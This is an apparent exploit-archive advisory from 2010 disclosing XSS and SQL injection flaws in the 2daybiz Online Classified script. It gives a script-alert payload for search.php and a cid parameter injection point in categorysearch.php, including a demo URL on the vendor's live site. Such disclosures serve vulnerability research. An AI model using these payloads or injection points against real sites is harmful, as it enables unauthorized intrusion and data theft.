2daybiz Online Classified script (SQL/XSS) Multiple Vulnerabilities

2010-06-29 16:03:57

# Exploit Title: 2daybiz Online Classified script Multiple (SQL Injection & XSS) Vulnerability
# Date: 25/06/2010
# Author: r45c4l
# Email: r45c4l[at]hotmail[dot]com
# Site : www.garage4hackers.com
# Script url: http://www.2daybiz.com/online_classified_script.html
# Version: N/A
# Tested on: Windows
# CVE : ()

:::::::::::::::::::::::::

:::::::::::::::::::::::::

=================Exploit======
---Indian Cyber warriors---



[ EXPL0!T ]

1- XSS

http://www.2daybiz.com/products/classified/search.php

Go to the page and in search bar type : <script>alert("r45c4l");</script>

2- SQL Injection

p0c - www.site.com/products/classified/categorysearch.php?cid=[SQLI]

dem0 - http://www.2daybiz.com/products/classified/categorysearch.php?cid=[SQLI]



===========================================================

Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0, Sandeep, Th3 RDX,

Vaibhav, All members of ICW and Hackers Garage, and all Indian Hackers

Greetz to: Lucky and Atul and team ICA

PROUD TO BE AN INDIAN

c0d3 for motherland, h4ck for motherland

Special Greetz to : www.hack0wn.com www.exploits-db.com www.inj3ct0r.com

=== End () ====

Fixes

No fixes

In order to submit a new fix you need to be registered.